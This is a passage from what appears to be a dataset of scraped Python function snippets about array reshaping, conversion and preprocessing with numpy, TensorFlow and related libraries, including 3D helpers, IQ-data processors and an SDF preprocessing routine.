range(len(data)):\n nd_data[_] = tf.keras.layers.Lambda(lambda x: x / 255)(data[_])\n\n else:\n for _ in range(len(data)):\n nd_data[_] = data[_]\n\n return nd_data", "def get_3d_H(H1):\n H_fin = [H1[0,0], 0, H1[0,1], H1[0,2], 0, 1, 0, 0, H1[1,0], 0, H1[1,1], H1[1,2]]\n H_fin = np.array(H_fin).reshape(3,4)\n return H_fin", "def reshape(arr):\r\n reshape_arr = np.empty((3,240,320),dtype='float32')\r\n reshape_arr[0,:,:] = arr[:,:,0]\r\n reshape_arr[1,:,:] = arr[:,:,1]\r\n reshape_arr[2,:,:] = arr[:,:,2]\r\n return reshape_arr", "def array(self):\n return np.array([self.w, self.x, self.y, self.z])", "def atleast_3d(*arys):\n res = []\n for a in arys:\n if not isinstance(a, cupy.ndarray):\n raise TypeError('Only cupy arrays can be atleast_3d')\n if a.ndim == 0:\n a = a.reshape(1, 1, 1)\n elif a.ndim == 1:\n a = a[cupy.newaxis, :, cupy.newaxis]\n elif a.ndim == 2:\n a = a[:, :, cupy.newaxis]\n res.append(a)\n if len(res) == 1:\n res = res[0]\n return res", "def vector3(x, y, z):\n return np.array([x, y, z], dtype=np.float)", "def _format_data(self, data: np.ndarray) -> np.ndarray:\n self._n_circs = 0\n self._n_shots = 0\n self._n_slots = 0\n self._n_iq = 0\n\n # identify shape\n try:\n # level1 single-shot data\n self._n_circs, self._n_shots, self._n_slots, self._n_iq = data.shape\n except ValueError:\n try:\n # level1 data averaged over shots\n self._n_circs, self._n_slots, self._n_iq = data.shape\n except ValueError as ex:\n raise DataProcessorError(\n f\"Data given to {self.__class__.__name__} is not likely level1 data.\"\n ) from ex\n\n if self._validate:\n if self._n_iq != 2:\n raise DataProcessorError(\n f\"IQ data given to {self.__class__.__name__} does not have two-dimensions \"\n f\"(I and Q). 
Instead, {self._n_iq} dimensions were found.\"\n )\n\n return data", "def numpy_to_cube(np_array, similar_cube, dimensions):\n\n new_cube = iris.cube.Cube.copy(similar_cube) # copy similar cube\n\n # time, lat, lon\n if dimensions == 3:\n new_cube.data[:,:,:] = np.nan # convert new cube entries to nan\n new_cube.data[:,:,:] = np_array # fill with numpy array data\n\n # lat, lon\n elif dimensions == 2:\n new_cube.data[:,:] = np.nan # convert new cube entries to nan\n new_cube.data[:,:] = np_array # fill with numpy array data\n\n # either time, lat or lon only\n elif dimensions == 1:\n new_cube.data[:] = np.nan # convert new cube entries to nan\n new_cube.data[:] = np_array # fill with numpy array data\n\n # return the numpy array, failed to convert to a cube\n else:\n print('failed to convert')\n new_cube = np_array\n\n return new_cube", "def readpil3d(self):\r\n\r\n # Read the data in as an array.\r\n res = np.loadtxt(self.name, delimiter=' ')\r\n\r\n # Split into useful chunks\r\n self.pos = res[:, 0:3] # Grid point locations\r\n self.Pn = res[:, 3:4] # Normal pressure [Pa]\r\n self.flux = res[:, -1] # Flux\r", "def get3dPCA(data):\n\n return PCA(n_components = 3).fit_transform(data)", "def jointsImgTo3D(sample):\n ret = np.zeros((sample.shape[0], 3), np.float32)\n for i in range(sample.shape[0]):\n ret[i] = jointImgTo3D(sample[i])\n return ret", "def _to_arraylike(data):\n _load_objects()\n if data is None:\n raise ValueError('Cannot convert None data.')\n return None\n if not isinstance(data, (ndarray, DataArray, DataFrame, Series, Index)):\n data = np.asarray(data)\n if not np.iterable(data):\n data = np.atleast_1d(data)\n return data", "def _reshape(self, data):\n batch_size, height, width, n_channels = data.shape\n if self._grid_height:\n grid_height = self._grid_height\n else:\n grid_height = int(math.floor(math.sqrt(batch_size)))\n\n grid_width = int(math.ceil(batch_size/grid_height))\n\n if n_channels == 1:\n data = np.tile(data, (1, 1, 1, 3))\n n_channels = 3\n\n if n_channels != 3:\n raise ValueError('Image batch must have either 1 or 3 channels, but '\n 'was {}'.format(n_channels))\n\n shape = (height * grid_height, width * grid_width, n_channels)\n buf = np.full(shape, 255, dtype=np.uint8)\n multiplier = 1 if data.dtype in (np.int32, np.int64) else 255\n\n for k in range(batch_size):\n i = k // grid_width\n j = k % grid_width\n arr = data[k]\n x, y = i * height, j * width\n buf[x:x + height, y:y + width, :] = np.clip(\n multiplier * arr, 0, 255).astype(np.uint8)\n\n if self._zoom > 1:\n buf = buf.repeat(self._zoom, axis=0).repeat(self._zoom, axis=1)\n return buf", "def to_image_space(data):\n return np.swapaxes(np.flip(data, 1), 0, 1)", "def _handle_input_data(data):\n data = np.asarray(data)\n if np.ndim(data) == 1:\n d_rows = 1\n d_cols = len(data)\n data = data.reshape((1, data.shape[0]))\n elif np.ndim(data) == 2:\n d_rows = data.shape[0]\n d_cols = data.shape[1]\n else:\n raise ValueError(\"Incorrect dimensionality of data. 
Must be <= 2\")\n return data, d_rows, d_cols", "def _process(self, data: np.ndarray) -> np.ndarray:\n return data[..., 0] * self.scale", "def get_A3():\n\n return array([[0.68557183+0.46550108j, 0.12934765-0.1622676j,\n 0.24409518+0.25335939j],\n [0.1531015 + 0.66678983j, 0.45112492+0.18206976j,\n -0.02633966+0.43477693j],\n [-0.10817164-1.16879196j, -0.18446849+0.03755672j,\n 0.06430325-0.44757084j]])", "def check_array_3D(X, coerce_to_numpy=True, is_univariate=False, min_timestamps=2):\n X = check_is_numpy_or_pd(X)\n if X.ndim != 3:\n raise ValueError(\n \"If passed as a np.array, X must be a 3-dimensional \"\n \"array, but found shape: {}\".format(X.shape)\n )\n if X.size == 0:\n raise ValueError(\n \"Input is empty or have a dimension of size 0\"\n \", found shape: {}\".format(X.shape)\n )\n if X.shape[2] <= min_timestamps:\n raise ValueError(\n \"Input should have more than {} timestamp\"\n \", found only: {}\".format(min_timestamps,X.shape[2])\n )\n if isinstance(X, pd.DataFrame):\n raise ValueError('Only accepting numpy array as inputs for 3D')\n if is_univariate:\n if X.shape[1] != 1:\n raise ValueError(\n \"X must be a 3-dimensional array with dimension 1 equal to 1\"\n )\n return X", "def data():\n return RaggedArray(\n [[0, 1], [1, 2, 3, 4], [], [-1, -2], []]*20, dtype='float64')", "def test_3d_tranpose(): \n dic,data = ng.pipe.read_lowmem(\"common_data/3d_pipe/ft/test%03d.ft3\")\n fdic,fdata = ng.pipe.read(\"common_data/3d_pipe/ft/test%03d.ft3\")\n\n assert_array_equal(data.transpose()[0,1,2],fdata.transpose()[0,1,2])\n assert_array_equal(data.transpose((2,0,1))[0,1,2],\n fdata.transpose((2,0,1))[0,1,2])\n assert_array_equal(data.swapaxes(0,1)[0,1,2],fdata.swapaxes(0,1)[0,1,2])\n assert_array_equal(data.swapaxes(2,0)[0,1,2],fdata.swapaxes(2,0)[0,1,2])", "def unet3d(input_shape, data_format='channels_first'):\n i = Input(shape=input_shape)\n\n down1, c1 = downconv_block(i, 16, 3)\n down2, c2 = downconv_block(down1, 32, 3)\n down3, c3 = downconv_block(down2, 64, 3)\n\n up1 = upconv_block(down3, 128, 3)\n crop1 = crop(c3, up1)\n merge_block = [up1, crop1]\n concat = concatenate(merge_block, axis=1)\n\n up2 = upconv_block(concat, 64, 3)\n crop2 = crop(c2, up2)\n merge_block = [up2, crop2]\n concat = concatenate(merge_block, axis=1)\n\n up3 = upconv_block(concat, 32, 3)\n crop3 = crop(c1, up3)\n merge_block = [up3, crop3]\n concat = concatenate(merge_block, axis=1)\n\n out1 = Conv3D(16, 3, activation='relu',\n padding='same', data_format=data_format)(concat)\n out2 = Conv3D(16, 3, activation='relu',\n padding='same', data_format=data_format)(out1)\n out3 = Conv3D(1, 1, activation='sigmoid',\n padding='same', data_format=data_format)(out2)\n\n model = Model(inputs=[i], outputs=[out3])\n\n return model", "def list_plot3d_array_of_arrays(v, interpolation_type, texture, **kwds):\n m = matrix(RDF, len(v), len(v[0]), v)\n G = list_plot3d(m, interpolation_type, texture, **kwds)\n G._set_extra_kwds(kwds)\n return G", "def _process(self, data: np.ndarray) -> np.ndarray:", "def _process(self, data: np.ndarray) -> np.ndarray:", "def _process(self, data: np.ndarray) -> np.ndarray:\n return data[..., 1] * self.scale", "def prepare(dataset):\n dataset = dataset.reshape(dataset.shape[0], 1, 28, 28)\n dataset = dataset.astype('float32')\n dataset /= 255\n return dataset", "def convert_data(self, channel, data):\n if not isinstance(data, np.ndarray):\n raise ValueError(\"data has to be numpy array\")\n\n # convert vDeflection from encoded to distance to force with linear conversion factors\n # the 
returned object is already a numpy ndarray in unit Newton (N)\n if channel == 'vDeflection':\n\n raw_m = self.properties.conversion_factors[channel][\"raw multiplier\"]\n raw_n = self.properties.conversion_factors[channel][\"raw offset\"]\n\n dist_m = self.properties.conversion_factors[channel][\"distance multiplier\"]\n dist_n = self.properties.conversion_factors[channel][\"distance offset\"]\n\n force_m = self.properties.conversion_factors[channel][\"force multiplier\"]\n force_n = self.properties.conversion_factors[channel][\"force offset\"]\n\n converted_data = ((raw_m * data + raw_n) * dist_m + dist_n) * force_m + force_n\n\n return converted_data\n\n # convert height from encoded to calibrated height\n # the returned object is already a numpy ndarray in unit Meter (m)\n elif channel == 'height':\n raw_m = self.properties.conversion_factors[channel][\"raw multiplier\"]\n raw_n = self.properties.conversion_factors[channel][\"raw offset\"]\n\n cal_m = self.properties.conversion_factors[channel][\"calibrated multiplier\"]\n cal_n = self.properties.conversion_factors[channel][\"calibrated offset\"]\n\n converted_data = (raw_m * data + raw_n) * cal_m + cal_n\n\n return converted_data\n\n else:\n raise ValueError(\"not a valid channel\")", "def _process(self, data: np.ndarray) -> np.ndarray:\n if not self.is_trained:\n raise DataProcessorError(\"SVD must be trained on data before it can be used.\")\n\n # IQ axis is reduced by projection\n if self._n_shots == 0:\n # level1 average mode\n dims = self._n_circs, self._n_slots\n else:\n # level1 single mode\n dims = self._n_circs, self._n_shots, self._n_slots\n\n projected_data = np.zeros(dims, dtype=object)\n\n for idx in range(self._n_slots):\n scale = self.parameters.scales[idx]\n axis = self.parameters.main_axes[idx]\n mean_i = self.parameters.i_means[idx]\n mean_q = self.parameters.q_means[idx]\n\n if self._n_shots != 0:\n # Single shot\n for circ_idx in range(self._n_circs):\n centered = [\n data[circ_idx, :, idx, 0] - mean_i,\n data[circ_idx, :, idx, 1] - mean_q,\n ]\n projected_data[circ_idx, :, idx] = axis @ np.array(centered) / scale\n else:\n # Averaged\n centered = [data[:, idx, 0] - mean_i, data[:, idx, 1] - mean_q]\n projected_data[:, idx] = axis @ np.array(centered) / scale\n\n return projected_data", "def _reshape_output(self, output):\n output = np.transpose(output, [0, 2, 3, 1])\n _, height, width, _ = output.shape\n dim1, dim2 = height, width\n dim3 = 3\n # There are CATEGORY_NUM=80 object categories:\n dim4 = (4 + 1 + CATEGORY_NUM)\n return np.reshape(output, (dim1, dim2, dim3, dim4))", "def to_numpy(x):\r\n return x.squeeze().detach().cpu().numpy()", "def flatten_data(data):\r\n result = []\r\n for mesurements in data:\r\n result.append(mesurements.flatten())\r\n return np.array(result)", "def transform(self, x: Array2D) -> Array2D:", "def to_fits_array(self):\n return self.data", "def _serialize(self, data):\n data = [np.array(j) for j in data]\n self._data_shape_list = [j.shape for j in data]\n serialized_data = [j.ravel() for j in data]\n serialized_data = np.hstack(serialized_data)\n return serialized_data", "def read_array(X, Y, Z):\n if isinstance(X, cls) and Y is None and Z is None:\n return cls(X.x, X.y, X.z)\n if (isinstance(X, (list, tuple, np.ndarray)) and len(X) == 3 and\n Y is None and Z is None):\n return cls(X[0], X[1], X[2])\n if X is None and Y is None and Z is None:\n return cls(0, 0, 0)\n if np.isscalar(X) and np.isscalar(Y) and np.isscalar(Z):\n xyz = np.r_[X, Y, Z]\n xyz = xyz.astype(float)\n return 
xyz.view(cls)\n raise ValueError('Invalid input for Vector3 - must be an instance '\n 'of a Vector3, a length-3 array, 3 scalars, or '\n 'nothing for [0., 0., 0.]')", "def transform(self, chunks):\n data = np.array([chunk.flatten() for chunk in chunks])\n\n return data", "def processing_data(raw_data):\n data = np.frombuffer(raw_data, np.uint8)\n data = np.reshape(data, [data.shape[0]//1029, -1])\n data = data[:, 5:]\n data = np.reshape(data, [1, -1])\n data = 256 * data[0, 0::2] + data[0, 1::2]\n data = 10 * (data / 65535)\n data = np.reshape(data, [-1, 8]).T\n return data", "def _deserialize(self, data):\n\n firstInd = 0\n deserialized_data = []\n for shp in self._data_shape_list:\n if len(shp) > 1:\n shift = np.prod(shp)\n elif len(shp) == 0:\n shift = 1\n else:\n shift = shp[0]\n tmp_array = data[firstInd:firstInd+shift]\n tmp_array = tmp_array.reshape(shp)\n deserialized_data.append(tmp_array)\n firstInd += shift\n return deserialized_data", "def ma2np(self):\n try:\n self.mask = self.Zarr.mask\n self.Zarr = ma.getdata(self.Zarr)\n except: print 'Data array is already numpy array'\n return", "def _data_reshape(self, data):\n data_offset = [int(size / 2) for size in data.shape[1:]]\n data_diff = [int(size / 2) for size in self.shape]\n data_diff_min = data_diff\n data_diff_max = []\n for i, elem in enumerate(data_diff):\n if self.shape[i] % 2 == 0:\n data_diff_max.append(elem)\n else:\n data_diff_max.append(elem + 1)\n data = data[:, (data_offset[0] - data_diff_min[0]):(data_offset[0] + data_diff_max[0]),\n (data_offset[1] - data_diff_min[1]):(data_offset[1] + data_diff_max[1]),\n (data_offset[2] - data_diff_min[2]):(data_offset[2] + data_diff_max[2])]\n\n if data.shape[1] == 1:\n data = data.reshape(data.shape[0], data.shape[2], data.shape[3])\n return data", "def get_data():\n data = [np.array([32.,595.]),\n np.array([30.,599.]),\n np.array([18.,622.]),\n np.array([51.,606.]),\n np.array([38.,578.])]\n return data", "def __array_wrap__(self, out_arr, context=None): #pylint: disable=no-self-use, unused-argument\n if out_arr.shape != (3,):\n out_arr = out_arr.view(np.ndarray)\n return out_arr", "def _reshape_channels(x):\n assert x.dim() == 4\n batch_size, nc, h, w = x.size()\n x_t = x.view(batch_size, nc, -1).transpose(1, 2).contiguous()\n x_t = x_t.view(batch_size, h, w, nc)\n return x_t", "def MakeCoordinates3D(self):\n\n self.points = np.concatenate((self.points, np.zeros((self.points.shape[0],1)) ), axis=1)\n self.points = np.ascontiguousarray(self.points)", "def from_numpy(data, transform, nodata=None, attrs={}, crs=None):\n nrow, ncol = data.shape[-2:]\n dims = (\"y\", \"x\")\n if len(data.shape) == 3:\n dims = (\"dim0\",) + dims\n elif len(data.shape) != 2:\n raise ValueError(\"Only 2D and 3D arrays supported\")\n da = xr.DataArray(\n data,\n dims=dims,\n coords=gis_utils.affine_to_coords(transform, (nrow, ncol)),\n )\n da.raster.set_spatial_dims(x_dim=\"x\", y_dim=\"y\")\n da.raster.set_nodata(nodata=nodata) # set _FillValue attr\n if attrs:\n da.attrs.update(attrs)\n if crs is not None:\n da.raster.set_crs(input_crs=crs)\n return da", "def image_to_array(self, img):\n x = np.asarray(img, dtype=self.dtype)\n if len(x.shape) == 3:\n if self.channels_first:\n x = x.transpose(2, 0, 1)\n elif len(x.shape) == 2:\n if self.channels_first:\n x = x.reshape((1, x.shape[0], x.shape[1]))\n else:\n x = x.reshape((x.shape[0], x.shape[1], 1))\n else:\n raise ValueError('Unsupported image shape: ', x.shape)\n return x", "def _preprocess_data_3d(\n self, data_batch: Dict[str, Any]) -> 
Tuple[tf.Tensor, tf.Tensor]:\n world2grid = data_batch['world2grid']\n uniform_samples = data_batch['uniform_samples']\n near_surface_samples = data_batch['near_surface_samples']\n if 'uniform_samples_per_camera' in data_batch:\n uniform_samples_per_camera = data_batch['uniform_samples_per_camera']\n if 'near_surface_samples_per_camera' in data_batch:\n near_surface_samples_per_camera = data_batch[\n 'near_surface_samples_per_camera']\n if 'depth_xyzn_per_camera' in data_batch:\n depth_xyzn_per_camera = data_batch['depth_xyzn_per_camera']\n\n batch_size = data_batch['near_surface_samples'].shape[0]\n spatial_dims = data_batch['grid_samples'].shape[1:4]\n\n # Assume grid size is the same in all dimensions.\n grid_size = spatial_dims[0]\n\n # Generate normalized [-1, 1] coordinates for grid samples.\n _, pixels_grid = point_sampling.sample3d_all_pixels(\n spatial_dims, normalize=True)\n pixels_grid = tf.tile(pixels_grid[None, ...], [batch_size, 1, 1, 1, 1])\n data_batch['grid_samples'] = tf.concat(\n [pixels_grid, data_batch['grid_samples']], axis=-1)\n # Tensor with shape [batch_size, dim_d, dim_h, dim_w, 4], (z, y, x).\n\n # Transform to grid space [0, 127] and map grid space [-0.5, 127.5] to\n # [-1, 1].\n uniform_samples = tf.linalg.matmul(\n world2grid[:, :3, :],\n tf.transpose(\n tf.concat([\n uniform_samples[..., :3],\n tf.ones(\n [batch_size, tf.shape(uniform_samples)[1], 1],\n dtype=tf.float32)\n ],\n axis=-1), [0, 2, 1]))\n # Tensor with shape [batch_size, 3, num_point].\n\n uniform_samples = (uniform_samples + 0.5) * 2.0 / grid_size - 1\n uniform_samples = uniform_samples[:, ::-1, :] # Convert to (z, y, x).\n uniform_samples = tf.concat([\n tf.transpose(uniform_samples, [0, 2, 1]),\n data_batch['uniform_samples'][..., 3:]\n ],\n axis=-1)\n data_batch['uniform_samples'] = uniform_samples\n\n near_surface_samples = tf.linalg.matmul(\n world2grid[:, :3, :],\n tf.transpose(\n tf.concat([\n near_surface_samples[..., :3],\n tf.ones([batch_size,\n tf.shape(near_surface_samples)[1], 1],\n dtype=tf.float32)\n ],\n axis=-1), [0, 2, 1]))\n near_surface_samples = (near_surface_samples + 0.5) * 2.0 / grid_size - 1\n near_surface_samples = near_surface_samples[:, ::-1, :]\n near_surface_samples = tf.concat([\n tf.transpose(near_surface_samples, [0, 2, 1]),\n data_batch['near_surface_samples'][..., 3:]\n ],\n axis=-1)\n data_batch['near_surface_samples'] = near_surface_samples\n\n if 'uniform_samples_per_camera' in data_batch:\n num_view = tf.shape(uniform_samples_per_camera)[1]\n num_point_per_view = tf.shape(uniform_samples_per_camera)[2]\n num_channel = tf.shape(uniform_samples_per_camera)[3]\n uniform_samples_per_camera = tf.reshape(uniform_samples_per_camera,\n [batch_size, -1, num_channel])\n uniform_samples_per_camera = tf.linalg.matmul(\n world2grid[:, :3, :],\n tf.transpose(\n tf.concat([\n uniform_samples_per_camera[..., :3],\n tf.ones(\n [batch_size,\n tf.shape(uniform_samples_per_camera)[1], 1],\n dtype=tf.float32)\n ],\n axis=-1), [0, 2, 1]))\n uniform_samples_per_camera = (uniform_samples_per_camera +\n 0.5) * 2.0 / grid_size - 1\n uniform_samples_per_camera = uniform_samples_per_camera[:, ::-1, :]\n uniform_samples_per_camera = tf.reshape(\n tf.transpose(uniform_samples_per_camera, [0, 2, 1]),\n [batch_size, num_view, num_point_per_view, -1])\n # Tensor with shape [batch_size, num_view, num_point_per_view, 3].\n\n uniform_samples_per_camera = tf.concat([\n uniform_samples_per_camera,\n data_batch['uniform_samples_per_camera'][..., 3:]\n ],\n axis=-1)\n 
data_batch['uniform_samples_per_camera'] = uniform_samples_per_camera\n\n if 'near_surface_samples_per_camera' in data_batch:\n num_view = tf.shape(near_surface_samples_per_camera)[1]\n num_point_per_view = tf.shape(near_surface_samples_per_camera)[2]\n num_channel = tf.shape(near_surface_samples_per_camera)[3]\n near_surface_samples_per_camera = tf.reshape(\n near_surface_samples_per_camera, [batch_size, -1, num_channel])\n near_surface_samples_per_camera = tf.linalg.matmul(\n world2grid[:, :3, :],\n tf.transpose(\n tf.concat([\n near_surface_samples_per_camera[..., :3],\n tf.ones([\n batch_size,\n tf.shape(near_surface_samples_per_camera)[1], 1\n ],\n dtype=tf.float32)\n ],\n axis=-1), [0, 2, 1]))\n near_surface_samples_per_camera = (near_surface_samples_per_camera +\n 0.5) * 2.0 / grid_size - 1\n near_surface_samples_per_camera = near_surface_samples_per_camera[:, ::\n -1, :]\n near_surface_samples_per_camera = tf.reshape(\n tf.transpose(near_surface_samples_per_camera, [0, 2, 1]),\n [batch_size, num_view, num_point_per_view, -1])\n # Tensor with shape [batch_size, num_view, num_point_per_view, 3].\n\n near_surface_samples_per_camera = tf.concat([\n near_surface_samples_per_camera,\n data_batch['near_surface_samples_per_camera'][..., 3:]\n ],\n axis=-1)\n data_batch[\n 'near_surface_samples_per_camera'] = near_surface_samples_per_camera\n\n if 'depth_xyzn_per_camera' in data_batch:\n num_view = tf.shape(depth_xyzn_per_camera)[1]\n num_point_per_view = tf.shape(depth_xyzn_per_camera)[2]\n num_channel = tf.shape(depth_xyzn_per_camera)[3]\n depth_xyzn_per_camera = tf.reshape(depth_xyzn_per_camera,\n [batch_size, -1, num_channel])\n depth_xyzn_per_camera = tf.linalg.matmul(\n world2grid[:, :3, :],\n tf.transpose(\n tf.concat([\n depth_xyzn_per_camera[..., :3],\n tf.ones([batch_size,\n tf.shape(depth_xyzn_per_camera)[1], 1],\n dtype=tf.float32)\n ],\n axis=-1), [0, 2, 1]))\n depth_xyzn_per_camera = (depth_xyzn_per_camera +\n 0.5) * 2.0 / grid_size - 1\n depth_xyzn_per_camera = depth_xyzn_per_camera[:, ::-1, :]\n depth_xyzn_per_camera = tf.reshape(\n tf.transpose(depth_xyzn_per_camera, [0, 2, 1]),\n [batch_size, num_view, num_point_per_view, -1])\n # Tensor with shape [batch_size, num_view, num_point_per_view, 3].\n\n depth_xyzn_per_camera = tf.concat(\n [depth_xyzn_per_camera, data_batch['depth_xyzn_per_camera'][..., 3:]],\n axis=-1)\n data_batch['depth_xyzn_per_camera'] = depth_xyzn_per_camera\n\n # Scale SDF\n data_batch['grid_samples'] = data_batch['grid_samples'] * \\\n tf.constant([1, 1, 1, self._sdf_scale], dtype=tf.float32)[None, None, None, None, :]\n data_batch['uniform_samples'] = data_batch['uniform_samples'] * \\\n tf.constant([1, 1, 1, self._sdf_scale], dtype=tf.float32)[None, None, :]\n data_batch['near_surface_samples'] = data_batch['near_surface_samples'] * \\\n tf.constant([1, 1, 1, self._sdf_scale], dtype=tf.float32)[None, None, :]\n if 'uniform_samples_per_camera' in data_batch:\n data_batch['uniform_samples_per_camera'] = data_batch['uniform_samples_per_camera'] * \\\n tf.constant([1, 1, 1, self._sdf_scale], dtype=tf.float32)[None, None, None, :]\n if 'near_surface_samples_per_camera' in data_batch:\n data_batch['near_surface_samples_per_camera'] = data_batch['near_surface_samples_per_camera'] * \\\n tf.constant([1, 1, 1, self._sdf_scale], dtype=tf.float32)[None, None, None, :]\n\n input_data = data_batch['grid_samples'][..., 3:4]\n # Tensor with shape [batch_size, dim_d, dim_h, dim_w, 1].\n\n gt_data = input_data\n\n return input_data, gt_data", "def _make_array(x):\n 
try:\n x = np.asfarray(x).squeeze()\n except ValueError:\n pass\n return x", "def _convert_data(self, data):\n if isinstance(data, Tensor):\n data = data.asnumpy()\n elif isinstance(data, list):\n data = np.array(data)\n elif isinstance(data, np.ndarray):\n pass\n else:\n raise TypeError('Input data type must be tensor, list or numpy.ndarray')\n return data", "def _format_data(self, data: np.ndarray) -> np.ndarray:\n self._n_shots = 0\n\n # identify shape\n try:\n # level1 single-shot data\n self._n_circs, self._n_shots, self._n_slots, self._n_iq = data.shape\n except ValueError as ex:\n raise DataProcessorError(\n f\"The data given to {self.__class__.__name__} does not have the shape of \"\n \"single-shot IQ data; expecting a 4D array.\"\n ) from ex\n\n if self._validate:\n if data.shape[-1] != 2:\n raise DataProcessorError(\n f\"IQ data given to {self.__class__.__name__} must be a multi-dimensional array\"\n \"of dimension [d0, d1, ..., 2] in which the last dimension \"\n \"corresponds to IQ elements.\"\n f\"Input data contains element with length {data.shape[-1]} != 2.\"\n )\n\n if self._validate:\n if isinstance(self._discriminator, list):\n if self._n_slots != len(self._discriminator):\n raise DataProcessorError(\n f\"The Discriminator node has {len(self._discriminator)} which does \"\n f\"not match the {self._n_slots} slots in the data.\"\n )\n\n return unp.nominal_values(data)", "def xr_dataset_to_array(ds, z_coord):\n # Determine the size of the dataset\n nvars = len(ds.keys())\n nvals = len(ds.coords[z_coord].values)\n \n # Create an empty array to store the data\n data = np.zeros((nvals, nvars+1))\n units = []\n \n # Insert the depth coordinate\n data[:,0] = ds.coords[z_coord].values\n units.append(ds.coords[z_coord].attrs['units'])\n \n # Insert the rest of the data\n variables = list(ds.keys())\n for i in range(len(variables)):\n data[:,i+1] = ds[variables[i]].values\n units.append(ds[variables[i]].attrs['units'])\n \n # Create a list of variables names\n names = [z_coord] + variables\n \n # Return the data\n return (data, names, units)", "def canonicalize(data):\n data = data.transpose(*[d for d in map(data.axes.find, 'TCIZYX') if d >= 0])\n projection = []\n\n if 'T' in data.axes and data.shape[0] == 1:\n projection.append(0) # remove trivial T dimension\n\n if 'C' not in data.axes:\n projection.append(None) # add trivial C dimension\n elif projection:\n projection.append(slice(None))\n\n if projection:\n projection += [slice(None) for d in 'ZYX']\n data = data.lazyget(tuple(projection))\n \n return data", "def _to_arrays(particle, count: int):\n if (\n isinstance(particle, np.ndarray)\n and len(particle.shape) == 2\n and particle.shape[0] == 4\n ):\n # Multiple particles provided\n return particle\n\n elif len(particle) == 4:\n # One particle\n out = np.zeros((4, count))\n out[0] += particle[0]\n out[1] += particle[1]\n out[2] += particle[2]\n out[3] += particle[3]\n\n return out\n\n raise ValueError(\n f\"target shape invalid: should either be a length-4 iterable [x, y, z, t] or a shape (4, N) array\\nGot {type(particle)}\"\n )", "def preprocess_3d(im_stack):\n im_stack /= 127.5\n im_stack -= 1.0\n return im_stack", "def get3d(infile, histname, subdir='',verbose=False): \n\n ## 2d Histogram\n Hist = getter(infile,histname,subdir,verbose)\n\n nbinsX, nbinsY, nbinsZ = Hist.GetNbinsX(), Hist.GetNbinsY(), Hist.GetNbinsZ()\n Arr = np.zeros((nbinsZ,nbinsY,nbinsX))\n dArr = np.zeros((nbinsZ,nbinsY,nbinsX))\n axesX = np.zeros(nbinsX)\n axesY = np.zeros(nbinsY)\n axesZ = 
np.zeros(nbinsZ)\n edgesX = np.zeros(nbinsX+1)\n edgesY = np.zeros(nbinsY+1)\n edgesZ = np.zeros(nbinsZ+1)\n for j in xrange(0,nbinsX):\n axesX[j] = Hist.GetXaxis().GetBinCenter(j+1)\n edgesX[j] = Hist.GetXaxis().GetBinLowEdge(j+1)\n edgesX[nbinsX] = Hist.GetXaxis().GetBinLowEdge(nbinsX+1)\n\n for j in xrange(0,nbinsY):\n axesY[j] = Hist.GetYaxis().GetBinCenter(j+1)\n edgesY[j] = Hist.GetYaxis().GetBinLowEdge(j+1)\n edgesY[nbinsY] = Hist.GetYaxis().GetBinLowEdge(nbinsY+1)\n\n for j in xrange(0,nbinsZ):\n axesZ[j] = Hist.GetZaxis().GetBinCenter(j+1)\n edgesZ[j] = Hist.GetZaxis().GetBinLowEdge(j+1)\n edgesZ[nbinsZ] = Hist.GetZaxis().GetBinLowEdge(nbinsZ+1)\n\n axes = [axesX, axesY, axesZ]\n edges = [edgesX, edgesY, edgesZ]\n \n for j in xrange(0,nbinsX):\n for k in xrange(0,nbinsY):\n for l in xrange(0,nbinsZ):\n Arr[l,k,j] = Hist.GetBinContent(j+1,k+1,l+1)\n dArr[l,k,j] = Hist.GetBinError(j+1,k+1,l+1)\n \n return axes, edges, Arr, dArr", "def preprocess(self, in_array):\n event = teca_time_py_event('teca_deeplab_ar_detect::preprocess')\n\n nx_in = in_array.shape[1]\n ny_in = in_array.shape[0]\n\n # get the padding sizes to make the mesh evenly divisible by 64 in the\n # x direction and 128 in the y direction\n ng_x0, ng_x1 = self.get_padding_sizes(64.0, nx_in)\n ng_y0, ng_y1 = self.get_padding_sizes(128.0, ny_in)\n\n nx_out = ng_x0 + ng_x1 + nx_in\n ny_out = ng_y0 + ng_y1 + ny_in\n\n # allocate a new larger array\n out_array = np.zeros((1, 3, ny_out, nx_out), dtype=np.float32)\n\n # copy the input array into the center\n out_array[:, :, ng_y0 : ng_y0 + ny_in,\n ng_x0 : ng_x0 + nx_in] = in_array\n\n # cache the padding info in order to extract the result\n self.ng_x0 = ng_x0\n self.ng_y0 = ng_y0\n self.nx_in = nx_in\n self.ny_in = ny_in\n\n return out_array", "def flat_to_2d(data, det_width):\n return data.reshape((data.shape[0], data.shape[1], det_width, det_width))", "def scale_on_3d(x3d, scaler):\n (n_segs, n_concat, n_freq) = x3d.shape\n x2d = x3d.reshape((n_segs * n_concat, n_freq))\n x2d = scaler.transform(x2d)\n x3d = x2d.reshape((n_segs, n_concat, n_freq))\n return x3d", "def normalize_data(data, n=1):\n\n if isinstance(data, str):\n # TODO: could Antti comment on this?\n # numpy array initialization works unintuitively with strings\n data = np.array([[data]], dtype=object)\n else:\n data = np.atleast_1d(data)\n\n if data.ndim == 1:\n if data.shape[0] == n:\n data = data[:, None]\n else:\n data = data[None, :]\n if n > 1:\n data = np.vstack((data, ) * n)\n else:\n if data.shape[0] != n:\n data = data[None, :]\n if n > 1:\n data = np.vstack((data, ) * n)\n return data", "def newVectorArray(numpart:int, ndim:int = 0, data_type=float, data_order:str='F') -> NP.ndarray:\n if ndim <= 0:\n ndim = pympscore.GetSpaceDim()\n return NP.empty((numpart,ndim), dtype=data_type, order=data_order)" ]
